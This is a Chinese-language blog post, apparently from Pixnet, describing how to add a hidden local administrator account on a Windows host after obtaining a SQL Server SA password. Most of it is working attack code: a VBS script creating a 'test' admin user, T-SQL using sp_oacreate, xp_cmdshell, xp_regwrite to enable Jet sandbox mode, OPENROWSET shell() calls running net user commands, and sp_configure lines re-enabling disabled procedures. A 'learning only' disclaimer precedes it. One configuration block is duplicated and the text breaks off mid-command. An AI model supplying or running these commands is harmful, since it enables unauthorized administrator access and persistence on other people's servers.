以下資訊只供學習參考,請不要用於不正當行為
在獲得SA密碼後,往往因為伺服器管理者或」前人」將net.exe和net1.exe被限制使用,無法添加管理員帳號。我們知道VBS在活動目錄(ADSI)部分有一個winnt物件,用來管理本地資源,利用它可以不依靠CMD等命令就能添加一個管理員,具體代碼如下:


 

set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os) '得到 adsi介面,綁定
Set oe=GetObject(os&"/Administrators,group") '屬性,admin組
Set od=ob.Create("user","test") '建立使用者
od.SetPassword "1234" '設置密碼
od.SetInfo '保存
Set of=GetObject(os&"/test",user) '得到使用者
oe.add os&"/test"
將上面的代碼保存為1.vbs,然後執行,命令為「cscript 1.vbs」,這樣就會在系統添加一個系統名為test,密碼為1234的使用者。具體在查詢分析器執行的代碼如下:


 

declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\1.vbs', 1
exec @ret = sp_oamethod @f, 'writeline', Null,'set wsnetwork=CreateObject
("WSCRIPT.NETWORK")'
exec @ret = sp_oamethod @f, 'writeline', Null,'os="WinNT://"&wsnetwork.
ComputerName'
exec @ret = sp_oamethod @f, 'writeline', Null,'Set ob=GetObject(os)'
exec @ret = sp_oamethod @f, 'writeline', Null,'Set oe=GetObject
(os&"/Administrators,group")'
exec @ret = sp_oamethod @f, 'writeline', Null,'Set od=ob.Create
("user","test")'
exec @ret = sp_oamethod @f, 'writeline', Null,'od.SetPassword "1234"'
exec @ret = sp_oamethod @f, 'writeline', Null,'od.SetInfo '
exec @ret = sp_oamethod @f, 'writeline', Null,'Set of=GetObject
(os&"/test",user) '
exec @ret = sp_oamethod @f, 'writeline', Null,'oe.add os&"/test"'
執行完上面的語句,再執行下面這行代碼,這行代碼一定單獨執行,不要與上面的放在一起執行,否則會提示「c:\1.vbs正被另一個程式運行」 而無法成功添加使用者:
exec master..xp_cmdshell 'cscript c:\1.vbs'
如果系統使用者沒有添加成功,有可能是因為系統使用者的密碼1234的太簡單,不符合伺服器的複雜密碼原則,可以考慮設置的複雜些,然後再測試一下。也可以使用echo將代碼寫到1.vbs中,代碼格式為:
 
 
 
 
exec master..xp_cmdshell 'echo set wsnetwork=CreateObject("WSCRIPT.NETWORK")
>>1.vbs'
不過,不知道為什麼所有帶「&」字元的命令列都無法寫入1.vbs,感興趣的朋友可以嘗試解決一下。
使用jet沙盤模式,可以解決XP_cmdshell等預存程序和相關動態連結程式庫帶來的煩惱。出於安全原因,系統預設情況下沙盤模式未開啟,這就需要xp_regwrite開啟沙盤模式:


 

Exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0
\Engines','SandBoxMode','REG_Dword',1
然後執行沙盤命令,在系統添加一個使用者名為test,密碼為1234的使用者:


 

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows
\system32\ias\ias.mdb','select shell("cmd.exe /c net user test 1234 /add")')
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows
\system32\ias\ias.mdb','select shell("cmd.exe /c net localgroup
administrators test /add")')
不同的作業系統,路徑也不一樣,需要根據情況做修改:


 

NT/2K: c:\winnt\system32\
XP/2003: c:\windows\system32\
另外Microsoft sql server2005在預設情況下,一些預存程序是關閉著的,需要命令打開:
開啟XP_cmdshell:


 

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure
'xp_cmdshell', 1;RECONFIGURE;
開啟'OPENROWSET':


 

exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure
'Ad Hoc Distributed Queries',1;RECONFIGURE;
開啟'sp_oacreate':


 

exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure
'Ad Hoc Distributed Queries',1;RECONFIGURE;
開啟'sp_oacreate':


 

exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp
 
 
arrow
arrow
    全站熱搜

    戮克 發表在 痞客邦 留言(0) 人氣()